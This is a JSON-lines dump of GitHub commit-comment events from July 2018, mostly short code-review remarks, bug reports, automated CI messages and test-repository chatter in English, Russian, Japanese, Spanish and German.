{"id":"7911887609","type":"CommitCommentEvent","actor":{"login":"solnsubuga"},"repo":{"name":"andela/hc-wits-kla"},"payload":{"comment":{"id":29579056,"position":null,"line":null,"path":null,"commit_id":"837637f89dfdc0d7e786300ee0f50c6141270e57","created_at":"2018-07-03T11:15:29Z","updated_at":"2018-07-03T11:15:29Z","author_association":"COLLABORATOR","body":"@RrNn Try to follow the best practices for writing commit messages: e.g [story-type #[pivotal-tracker-id]] Description of task that has been implemented."}},"created_at":"2018-07-03T11:15:29Z"}
{"id":"7911889565","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"andrej2012/NET.S.2018.Kozlovski.02"},"payload":{"comment":{"id":29579060,"position":18,"line":18,"path":"FirstTask/FindNextBiggerNumberClass.cs","commit_id":"ec0fb64f3a60b47af8e09f29c948578a3f5d1d49","created_at":"2018-07-03T11:15:55Z","updated_at":"2018-07-03T11:15:55Z","author_association":"NONE","body":"эта версия должна существовать как перегруженная параллельно с версией public static int FindNextBiggerNumber(int number). "}},"created_at":"2018-07-03T11:15:55Z"}
{"id":"7911890157","type":"CommitCommentEvent","actor":{"login":"emin93"},"repo":{"name":"emin93/react-native-template-typescript"},"payload":{"comment":{"id":29579062,"position":5,"line":5,"path":"tsconfig.json","commit_id":"172b32155dcf71921d1c93fe0e7f5a6b8dcee9fe","created_at":"2018-07-03T11:16:03Z","updated_at":"2018-07-03T11:16:03Z","author_association":"OWNER","body":"Woops, I've mistakenly updated the jsx mode to react. Reverted this in the next commit."}},"created_at":"2018-07-03T11:16:03Z"}
{"id":"7911892458","type":"CommitCommentEvent","actor":{"login":"oberon-manjaro"},"repo":{"name":"mltframework/mlt"},"payload":{"comment":{"id":29579068,"position":null,"line":null,"path":null,"commit_id":"7bf5da86d4f2f8f83f45b9809fb061cbfdd97906","created_at":"2018-07-03T11:16:34Z","updated_at":"2018-07-03T11:16:34Z","author_association":"NONE","body":"Surprisingly this commit results in [**flowblade**](https://github.com/jliljebl/flowblade) segfaulting.\r\nI wonder if you might have any explanation or a hint on how this could be fixed in flowblade code.\r\nThanks.\r\nAlso see https://github.com/jliljebl/flowblade/issues/508  "}},"created_at":"2018-07-03T11:16:34Z"}
{"id":"7911896314","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29579075,"position":63,"line":76,"path":"src/HardwareLayout.h","commit_id":"9b4985a23111ac7d6183c8d0d041f4fbd0b43389","created_at":"2018-07-03T11:17:26Z","updated_at":"2018-07-03T11:17:26Z","author_association":"OWNER","body":"А еще он приоритет устанавливает. Как думаете, стоит добавить сеттер(апдейтер)/геттер приоритетов и при инициализации экземпляра вызывать из конструктора?"}},"created_at":"2018-07-03T11:17:26Z"}
{"id":"7911896994","type":"CommitCommentEvent","actor":{"login":"Yogu"},"repo":{"name":"AEB-labs/cruddl"},"payload":{"comment":{"id":29579076,"position":26,"line":26,"path":"src/schema/preparation/ast-validation-modules/default-value-validator.ts","commit_id":"dc8f4def619e0ef53c59b47155558e68500fbfa3","created_at":"2018-07-03T11:17:36Z","updated_at":"2018-07-03T11:17:36Z","author_association":"MEMBER","body":"@henkesn Do you remember why you disallowed default values in value objects? I'm not sure whether to keep this validation in the next release."}},"created_at":"2018-07-03T11:17:36Z"}
{"id":"7911897607","type":"CommitCommentEvent","actor":{"login":"The-Compiler"},"repo":{"name":"qutebrowser/qutebrowser"},"payload":{"comment":{"id":29579077,"position":null,"line":null,"path":null,"commit_id":"0af8eec73a8a4290b0a0348f3ad8d8295e17deaa","created_at":"2018-07-03T11:17:44Z","updated_at":"2018-07-03T11:17:44Z","author_association":"COLLABORATOR","body":"Good catch, thanks! Removed that as well now."}},"created_at":"2018-07-03T11:17:44Z"}
{"id":"7911901133","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29579082,"position":83,"line":95,"path":"src/HardwareLayout.h","commit_id":"9b4985a23111ac7d6183c8d0d041f4fbd0b43389","created_at":"2018-07-03T11:18:32Z","updated_at":"2018-07-03T11:18:32Z","author_association":"OWNER","body":"Поля класса в приват?"}},"created_at":"2018-07-03T11:18:32Z"}
{"id":"7911905070","type":"CommitCommentEvent","actor":{"login":"clackcx"},"repo":{"name":"clackcx/test"},"payload":{"comment":{"id":29579089,"position":1,"line":1,"path":"README.md","commit_id":"22e73872d42eae0b7c1ea41a808b9576b159322a","created_at":"2018-07-03T11:19:27Z","updated_at":"2018-07-03T11:19:27Z","author_association":"OWNER","body":"2018-7-3 19:19"}},"created_at":"2018-07-03T11:19:27Z"}
{"id":"7911905537","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"andrej2012/NET.S.2018.Kozlovski.02"},"payload":{"comment":{"id":29579092,"position":180,"line":180,"path":"FirstTask/FindNextBiggerNumberClass.cs","commit_id":"ec0fb64f3a60b47af8e09f29c948578a3f5d1d49","created_at":"2018-07-03T11:19:33Z","updated_at":"2018-07-03T11:19:33Z","author_association":"NONE","body":"локоничнее  и предпочтительнее будет так\r\n private static int TimeForMethod(Stopwatch startTime) => startTime.Elapsed.Milliseconds;\r\n\r\n"}},"created_at":"2018-07-03T11:19:33Z"}
{"id":"7911906183","type":"CommitCommentEvent","actor":{"login":"Legion2"},"repo":{"name":"AmyAssist/Amy"},"payload":{"comment":{"id":29579097,"position":35,"line":63,"path":"core/src/test/java/de/unistuttgart/iaas/amyassist/amy/core/pluginloader/PluginManagerTest.java","commit_id":"be94783458b8a91d3d4ab2e2f5f16e7ec7308da4","created_at":"2018-07-03T11:19:42Z","updated_at":"2018-07-03T11:19:42Z","author_association":"MEMBER","body":"use a TempDir for tests"}},"created_at":"2018-07-03T11:19:42Z"}
{"id":"7911907069","type":"CommitCommentEvent","actor":{"login":"orsinium"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29579098,"position":23,"line":23,"path":"notes-ru/db-models.md","commit_id":"104397ccd93e347a4f0bbd4bc60e94e57b533f11","created_at":"2018-07-03T11:19:54Z","updated_at":"2018-07-03T11:19:54Z","author_association":"OWNER","body":"Добавил все комментарии в статью)"}},"created_at":"2018-07-03T11:19:54Z"}
{"id":"7911907978","type":"CommitCommentEvent","actor":{"login":"orsinium"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29579103,"position":23,"line":23,"path":"notes-ru/db-models.md","commit_id":"104397ccd93e347a4f0bbd4bc60e94e57b533f11","created_at":"2018-07-03T11:20:07Z","updated_at":"2018-07-03T11:20:07Z","author_association":"OWNER","body":"Спасибо за фидбэк"}},"created_at":"2018-07-03T11:20:07Z"}
{"id":"7911912419","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"andrej2012/NET.S.2018.Kozlovski.02"},"payload":{"comment":{"id":29579109,"position":148,"line":148,"path":"FirstTask/FindNextBiggerNumberClass.cs","commit_id":"ec0fb64f3a60b47af8e09f29c948578a3f5d1d49","created_at":"2018-07-03T11:21:06Z","updated_at":"2018-07-03T11:21:06Z","author_association":"NONE","body":"судя по названию метода, он должен вернуть ссылку на массив, а не принимать его в параметрах"}},"created_at":"2018-07-03T11:21:06Z"}
{"id":"7911912614","type":"CommitCommentEvent","actor":{"login":"openhab-bot"},"repo":{"name":"openhab/org.openhab.binding.zwave"},"payload":{"comment":{"id":29579111,"position":null,"line":null,"path":null,"commit_id":"a682a47603e84d921011ef1e1bf4c7761d3a00c2","created_at":"2018-07-03T11:21:08Z","updated_at":"2018-07-03T11:21:08Z","author_association":"COLLABORATOR","body":"This commit has been mentioned on **openHAB Community**. There might be relevant details there:\n\nhttps://community.openhab.org/t/oh2-z-wave-refactoring-and-testing-and-security/21653/3091\n"}},"created_at":"2018-07-03T11:21:08Z"}
{"id":"7911914962","type":"CommitCommentEvent","actor":{"login":"Legion2"},"repo":{"name":"AmyAssist/Amy"},"payload":{"comment":{"id":29579112,"position":22,"line":68,"path":"core/src/main/java/de/unistuttgart/iaas/amyassist/amy/core/pluginloader/PluginLoader.java","commit_id":"be94783458b8a91d3d4ab2e2f5f16e7ec7308da4","created_at":"2018-07-03T11:21:38Z","updated_at":"2018-07-03T11:21:38Z","author_association":"MEMBER","body":"Use Path instead of File"}},"created_at":"2018-07-03T11:21:38Z"}
{"id":"7911916079","type":"CommitCommentEvent","actor":{"login":"thomasmari"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29579117,"position":null,"line":null,"path":null,"commit_id":"23cca1ff73185ab4960a4b81a6ed866a3f32b924","created_at":"2018-07-03T11:21:52Z","updated_at":"2018-07-03T11:21:52Z","author_association":"OWNER","body":"The logs are updated with the current version. I fact I don't even remember writing  \r\n[secondStage] (stage=1) && (preemption=1) --service2Time-> (stage'=0); "}},"created_at":"2018-07-03T11:21:52Z"}
{"id":"7911917790","type":"CommitCommentEvent","actor":{"login":"paulina-bukowska"},"repo":{"name":"paulina-bukowska/my_testing"},"payload":{"comment":{"id":29579121,"position":null,"line":null,"path":null,"commit_id":"1455bb83a416467a9d218dd29ab5e784a2a60835","created_at":"2018-07-03T11:22:15Z","updated_at":"2018-07-03T11:22:15Z","author_association":"OWNER","body":"**Task description**\r\n\r\nThis is a demo task.\r\n\r\nWrite a function:\r\n\r\nclass Solution { public int solution(int[] A); }\r\n\r\nthat, given an array A of N integers, returns the smallest positive integer (greater than 0) that does not occur in A.\r\n\r\nFor example, given A = [1, 3, 6, 4, 1, 2], the function should return 5.\r\n\r\nGiven A = [1, 2, 3], the function should return 4.\r\n\r\nGiven A = [−1, −3], the function should return 1.\r\n\r\nAssume that:\r\n\r\nN is an integer within the range [1..100,000];\r\neach element of array A is an integer within the range [−1,000,000..1,000,000].\r\nComplexity:\r\n\r\nexpected worst-case time complexity is O(N);\r\nexpected worst-case space complexity is O(N) (not counting the storage required for input arguments)."}},"created_at":"2018-07-03T11:22:15Z"}
{"id":"7911924064","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29579132,"position":29,"line":29,"path":"2-14/2-14.cpp","commit_id":"3bdcbb0b7b18ce3e839c4a8108a7cce3797c30c6","created_at":"2018-07-03T11:23:39Z","updated_at":"2018-07-03T11:23:39Z","author_association":"COLLABORATOR","body":"コメント記入者：卜部\r\n1行に複数ステートメント書くのはやめましょう。"}},"created_at":"2018-07-03T11:23:39Z"}
{"id":"7911927683","type":"CommitCommentEvent","actor":{"login":"PriyaPrabakaran"},"repo":{"name":"PriyaPrabakaran/HelloWorld"},"payload":{"comment":{"id":29579137,"position":1,"line":1,"path":"README.md","commit_id":"b3a4e62c508af3a662ee9d0a1cc8febb83f51f9d","created_at":"2018-07-03T11:24:29Z","updated_at":"2018-07-03T11:24:29Z","author_association":"OWNER","body":"Hai all\r\nWelcome you all enjoy tha day your "}},"created_at":"2018-07-03T11:24:29Z"}
{"id":"7911928045","type":"CommitCommentEvent","actor":{"login":"Legion2"},"repo":{"name":"AmyAssist/Amy"},"payload":{"comment":{"id":29579139,"position":5,"line":44,"path":"core/src/main/java/de/unistuttgart/iaas/amyassist/amy/core/io/EnvironmentService.java","commit_id":"be94783458b8a91d3d4ab2e2f5f16e7ec7308da4","created_at":"2018-07-03T11:24:34Z","updated_at":"2018-07-03T11:24:34Z","author_association":"MEMBER","body":"`.toAbsolutePath()` should be called iff needed by consumers"}},"created_at":"2018-07-03T11:24:34Z"}
{"id":"7911946203","type":"CommitCommentEvent","actor":{"login":"minershive"},"repo":{"name":"minershive/hiveos-linux"},"payload":{"comment":{"id":29579178,"position":null,"line":null,"path":null,"commit_id":"ec09a23d3dea29cba11c755d30c648a2c5d06488","created_at":"2018-07-03T11:28:39Z","updated_at":"2018-07-03T11:28:39Z","author_association":"OWNER","body":"нет, не должен.\r\nможно конечно установить что угодно, но решили чтобы у каждого майнера своя директория была"}},"created_at":"2018-07-03T11:28:39Z"}
{"id":"7911946267","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29579179,"position":28,"line":28,"path":"2-16/2-16.cpp","commit_id":"3bdcbb0b7b18ce3e839c4a8108a7cce3797c30c6","created_at":"2018-07-03T11:28:39Z","updated_at":"2018-07-03T11:28:39Z","author_association":"COLLABORATOR","body":"コメント記入者：卜部\r\n複数ステートメント書くのはやめましょう。\r\nまた、教本に載っていればですが、各値ごとに季節を出力するのではなく、同じ季節はまとめましょう。\r\nまた、デフォルト処理として1～12以外が入力された場合の対処もしてみましょう"}},"created_at":"2018-07-03T11:28:39Z"}
{"id":"7911954054","type":"CommitCommentEvent","actor":{"login":"Legion2"},"repo":{"name":"AmyAssist/Amy"},"payload":{"comment":{"id":29579202,"position":20,"line":61,"path":"core/src/main/java/de/unistuttgart/iaas/amyassist/amy/core/configuration/ConfigurationLoader.java","commit_id":"be94783458b8a91d3d4ab2e2f5f16e7ec7308da4","created_at":"2018-07-03T11:30:24Z","updated_at":"2018-07-03T11:30:24Z","author_association":"MEMBER","body":"multiple config paths are to complex, we can implement a default config dir and a custom config, this is supported by Java Properties"}},"created_at":"2018-07-03T11:30:24Z"}
{"id":"7911955951","type":"CommitCommentEvent","actor":{"login":"Legion2"},"repo":{"name":"AmyAssist/Amy"},"payload":{"comment":{"id":29579205,"position":4,"line":26,"path":"core/src/main/java/de/unistuttgart/iaas/amyassist/amy/core/configuration/ConfigurationLoader.java","commit_id":"be94783458b8a91d3d4ab2e2f5f16e7ec7308da4","created_at":"2018-07-03T11:30:48Z","updated_at":"2018-07-03T11:30:48Z","author_association":"MEMBER","body":"don't use java.io.File"}},"created_at":"2018-07-03T11:30:48Z"}
{"id":"7911956587","type":"CommitCommentEvent","actor":{"login":"mAAdhaTTah"},"repo":{"name":"pedronauck/docz"},"payload":{"comment":{"id":29579208,"position":null,"line":null,"path":null,"commit_id":"4f10a6d7e78f4b5ae3f3ee27ea1e8cefae456240","created_at":"2018-07-03T11:30:56Z","updated_at":"2018-07-03T11:30:56Z","author_association":"NONE","body":"This commit doesn't account for a `package.json` existing but not having a `name` property, e.g. in a monorepo. I get this stack trace:\r\n\r\n```\r\n$ docz dev\r\n/path/to/project/node_modules/yargs/yargs.js:1144\r\n      else throw err\r\n           ^\r\n\r\nTypeError: Cannot read property 'replace' of undefined\r\n    at removeScope (/path/to/project/node_modules/docz-core/dist/index.js:1:21075)\r\n    at getInitialTitle (/path/to/project/node_modules/docz-core/dist/index.js:1:21193)\r\n    at Object.args [as builder] (/path/to/project/node_modules/docz-core/dist/index.js:1:21517)\r\n    at Object.runCommand (/path/to/project/node_modules/yargs/lib/command.js:185:35)\r\n    at Object.parseArgs [as _parseArgs] (/path/to/project/node_modules/yargs/yargs.js:1059:30)\r\n    at Object.get [as argv] (/path/to/project/node_modules/yargs/yargs.js:1000:21)\r\n    at Object.<anonymous> (/path/to/project/node_modules/docz/bin/index.js:13:74)\r\n    at Module._compile (module.js:652:30)\r\n    at Object.Module._extensions..js (module.js:663:10)\r\n    at Module.load (module.js:565:32)\r\n    at tryModuleLoad (module.js:505:12)\r\n    at Function.Module._load (module.js:497:3)\r\n    at Function.Module.runMain (module.js:693:10)\r\n    at startup (bootstrap_node.js:191:16)\r\n    at bootstrap_node.js:612:3\r\n```"}},"created_at":"2018-07-03T11:30:56Z"}
{"id":"7911959579","type":"CommitCommentEvent","actor":{"login":"callqw"},"repo":{"name":"callqw/test-wsjr"},"payload":{"comment":{"id":29579216,"position":5,"line":5,"path":"controllers/test.js","commit_id":"4a2b63fce8298bd57e6264dba9d878767ff2c054","created_at":"2018-07-03T11:31:33Z","updated_at":"2018-07-03T11:31:33Z","author_association":"OWNER","body":"gtrg"}},"created_at":"2018-07-03T11:31:33Z"}
{"id":"7911959907","type":"CommitCommentEvent","actor":{"login":"chenlfc"},"repo":{"name":"chenlfc/gitskills"},"payload":{"comment":{"id":29579217,"position":8,"line":8,"path":"README.md","commit_id":"4f465fee0439e82eb075379efdbc24eff3aab6b3","created_at":"2018-07-03T11:31:37Z","updated_at":"2018-07-03T11:31:37Z","author_association":"OWNER","body":"new line as WEB changed."}},"created_at":"2018-07-03T11:31:37Z"}
{"id":"7911965168","type":"CommitCommentEvent","actor":{"login":"kotik"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29579230,"position":33,"line":34,"path":"notes-ru/db-models.md","commit_id":"f2eb6ef1b5db2743ed7bf4d1120426450eadc4a1","created_at":"2018-07-03T11:32:46Z","updated_at":"2018-07-03T11:32:46Z","author_association":"NONE","body":"У меня еще есть одна частая боль в Django Admin :)\r\nЭто долгий рендеринг дропдаунов, которые соответствуют FK на таблицы с большим кол-вом записей. Иногда это мегабайты HTML `<select> <opition 1>...<opition 10000></select>`\r\n\r\nМы тут практикуем два подхода в админке\r\n1) Если поле не подразумевается менять, то сделать поле `readonly` через https://docs.djangoproject.com/en/2.0/ref/contrib/admin/#django.contrib.admin.ModelAdmin.readonly_fields\r\n2) Использовать http://django-select2.readthedocs.io/en/latest/ с отложенной подгрузкой вариантов и поиском по ним"}},"created_at":"2018-07-03T11:32:46Z"}
{"id":"7911969532","type":"CommitCommentEvent","actor":{"login":"ElisaIzrailova"},"repo":{"name":"Kyubyong/dc_tts"},"payload":{"comment":{"id":29579240,"position":null,"line":null,"path":null,"commit_id":"8b38110875920923343778ff959d01501323765e","created_at":"2018-07-03T11:33:44Z","updated_at":"2018-07-03T11:33:44Z","author_association":"NONE","body":"Congratulations on the creation of the Korean synthesis. I'm very interested in your technique!\r\nI have a question. I am engaged in the synthesis of the Chechen language. This is in Russia (the Caucasus). We have nothing. I am a pioneer)) Therefore I create a speech building for training. This is necessarily such a short sentence of not more than 180 characters, as indicated in the file hparams.py. And if you make long sentences of 400 or 500 characters, will the network be able to learn?"}},"created_at":"2018-07-03T11:33:44Z"}
{"id":"7911972407","type":"CommitCommentEvent","actor":{"login":"PriyaPrabakaran"},"repo":{"name":"PriyaPrabakaran/HelloWorld"},"payload":{"comment":{"id":29579243,"position":null,"line":null,"path":null,"commit_id":"b3a4e62c508af3a662ee9d0a1cc8febb83f51f9d","created_at":"2018-07-03T11:34:23Z","updated_at":"2018-07-03T11:34:23Z","author_association":"OWNER","body":"Finished README \r\nload the value for tha content\r\n"}},"created_at":"2018-07-03T11:34:23Z"}
{"id":"7911982101","type":"CommitCommentEvent","actor":{"login":"mahlamusa"},"repo":{"name":"mahlamusa/wcvendors"},"payload":{"comment":{"id":29579267,"position":null,"line":null,"path":null,"commit_id":"dc2359d869a34c4789e3e0378dd0e6d4556fa5ca","created_at":"2018-07-03T11:36:38Z","updated_at":"2018-07-03T11:36:38Z","author_association":"OWNER","body":"Issue: https://github.com/wcvendors/wcvendors/issues/456\r\n\r\nThe textbox is using the Chosen library which was replaced by Select2 so it was not getting the list of products."}},"created_at":"2018-07-03T11:36:38Z"}
{"id":"7911982736","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29579269,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-03T11:36:46Z","updated_at":"2018-07-03T11:36:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T11:36:46Z"}
{"id":"7911983622","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29579270,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-03T11:36:58Z","updated_at":"2018-07-03T11:36:58Z","author_association":"OWNER","body":"\r\n{ENTER}\r\n[f03072018113645_download.txt](https://github.com/githubuserdlp/TEST/files/2159068/f03072018113645_download.txt)\r\n"}},"created_at":"2018-07-03T11:36:58Z"}
{"id":"7911984514","type":"CommitCommentEvent","actor":{"login":"prasanthhs"},"repo":{"name":"dice-group/sask"},"payload":{"comment":{"id":29579272,"position":15,"line":33,"path":"webclient/src/main/resources/static/js/status/Status.js","commit_id":"bd6fe93b2b50c8a9702f6bc97642ada037446bfc","created_at":"2018-07-03T11:37:08Z","updated_at":"2018-07-03T11:37:08Z","author_association":"COLLABORATOR","body":"Why isn't this fixed from single quote to double?"}},"created_at":"2018-07-03T11:37:08Z"}
{"id":"7911987112","type":"CommitCommentEvent","actor":{"login":"shlomitc"},"repo":{"name":"wix/wix-style-react"},"payload":{"comment":{"id":29579275,"position":5,"line":20,"path":"CHANGELOG.md","commit_id":"12117b95f2fe918b067a06aed6cb5e3ad1c8e31a","created_at":"2018-07-03T11:37:41Z","updated_at":"2018-07-03T11:37:41Z","author_association":"COLLABORATOR","body":"which ones? might want to add the pull request link as well"}},"created_at":"2018-07-03T11:37:41Z"}
{"id":"7911994588","type":"CommitCommentEvent","actor":{"login":"TheReyzer"},"repo":{"name":"hippogamesunity/SimpleGif"},"payload":{"comment":{"id":29579286,"position":null,"line":null,"path":null,"commit_id":"c90b737cf1b70846ecc6fa06da53f41fc0872980","created_at":"2018-07-03T11:39:21Z","updated_at":"2018-07-03T11:39:21Z","author_association":"NONE","body":"Hi man, thank you for update this app, but... We need 1000x1000"}},"created_at":"2018-07-03T11:39:21Z"}
{"id":"7911997759","type":"CommitCommentEvent","actor":{"login":"mattheworiordan"},"repo":{"name":"tomczoink/HackWiki"},"payload":{"comment":{"id":29579293,"position":null,"line":null,"path":null,"commit_id":"7e188d4254f80e87047d9e1167376ff36ef5df70","created_at":"2018-07-03T11:40:04Z","updated_at":"2018-07-03T11:40:04Z","author_association":"NONE","body":"You have two commits titled \"Initial commit\""}},"created_at":"2018-07-03T11:40:04Z"}
{"id":"7911998277","type":"CommitCommentEvent","actor":{"login":"kitwestneat"},"repo":{"name":"leggomuhgreggo/ati"},"payload":{"comment":{"id":29579294,"position":28,"line":28,"path":"src/components/modules/Instagram/index.js","commit_id":"cf5075bff15d052a103d558525e47cd2274de3e7","created_at":"2018-07-03T11:40:12Z","updated_at":"2018-07-03T11:40:12Z","author_association":"COLLABORATOR","body":"this {\" \"} seems wacky, is that really necessary?"}},"created_at":"2018-07-03T11:40:12Z"}
{"id":"7911999254","type":"CommitCommentEvent","actor":{"login":"SirMoM"},"repo":{"name":"SirMoM/game"},"payload":{"comment":{"id":29579295,"position":null,"line":null,"path":null,"commit_id":"33301073f905e014a1b4a0b622e4f1055e7601c2","created_at":"2018-07-03T11:40:24Z","updated_at":"2018-07-03T11:40:24Z","author_association":"OWNER","body":"@jeanpauledoh wenn du noch mehr pixelart für sowas machst könnte es richtig gut werden"}},"created_at":"2018-07-03T11:40:24Z"}
{"id":"7912004866","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29579308,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-03T11:41:36Z","updated_at":"2018-07-03T11:41:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T11:41:36Z"}
{"id":"7912009204","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29579323,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-03T11:42:36Z","updated_at":"2018-07-03T11:42:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T11:42:36Z"}
{"id":"7912014226","type":"CommitCommentEvent","actor":{"login":"drfho"},"repo":{"name":"zopefoundation/Zope"},"payload":{"comment":{"id":29579344,"position":20,"line":858,"path":"src/OFS/ObjectManager.py","commit_id":"d8901f6c940386adf4883471f6ca290981e86a66","created_at":"2018-07-03T11:43:44Z","updated_at":"2018-07-03T11:43:44Z","author_association":"NONE","body":"@icemac Actually I am not: that is why I tried to provoce an exception during all day zmi usage, but I didn't get one until now. Maybe you can help me (as the gui guy) and can add a 'lege artis' error message for the logger. Thank you very much for the hint."}},"created_at":"2018-07-03T11:43:44Z"}
{"id":"7912015429","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29579345,"position":null,"line":null,"path":null,"commit_id":"15663e459262c433fc58e5d8f17bfcb6991c363f","created_at":"2018-07-03T11:43:59Z","updated_at":"2018-07-03T11:43:59Z","author_association":"NONE","body":"И опять дикое количество лишних комитов!"}},"created_at":"2018-07-03T11:43:59Z"}
{"id":"7912016206","type":"CommitCommentEvent","actor":{"login":"JNP7"},"repo":{"name":"JNP7/udemy-heroes"},"payload":{"comment":{"id":29579346,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-03T11:44:10Z","updated_at":"2018-07-03T11:44:10Z","author_association":"OWNER","body":"## Comentario"}},"created_at":"2018-07-03T11:44:10Z"}
{"id":"7912017317","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29579347,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-03T11:44:25Z","updated_at":"2018-07-03T11:44:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T11:44:25Z"}
{"id":"7912019132","type":"CommitCommentEvent","actor":{"login":"JNP7"},"repo":{"name":"JNP7/udemy-heroes"},"payload":{"comment":{"id":29579348,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-03T11:44:50Z","updated_at":"2018-07-03T11:44:50Z","author_association":"OWNER","body":"# Notas"}},"created_at":"2018-07-03T11:44:50Z"}
{"id":"7912023198","type":"CommitCommentEvent","actor":{"login":"vaish-rahul"},"repo":{"name":"SmartThingsCommunity/SmartThingsPublic"},"payload":{"comment":{"id":29579363,"position":5,"line":561,"path":"devicetypes/smartthings/zigbee-lock.src/zigbee-lock.groovy","commit_id":"a4180eb1f032567a6a74cb91e74fc5b24b073148","created_at":"2018-07-03T11:45:44Z","updated_at":"2018-07-03T11:45:44Z","author_association":"CONTRIBUTOR","body":"[This](https://github.com/SmartThingsCommunity/SmartThingsCapabilities/blob/master/capabilities/lock.src/lock.yml) specifies `codeId `to be a string. What you are adding in the map is an integer. Will this create a problem?\r\nCC: @Bijnagte "}},"created_at":"2018-07-03T11:45:44Z"}
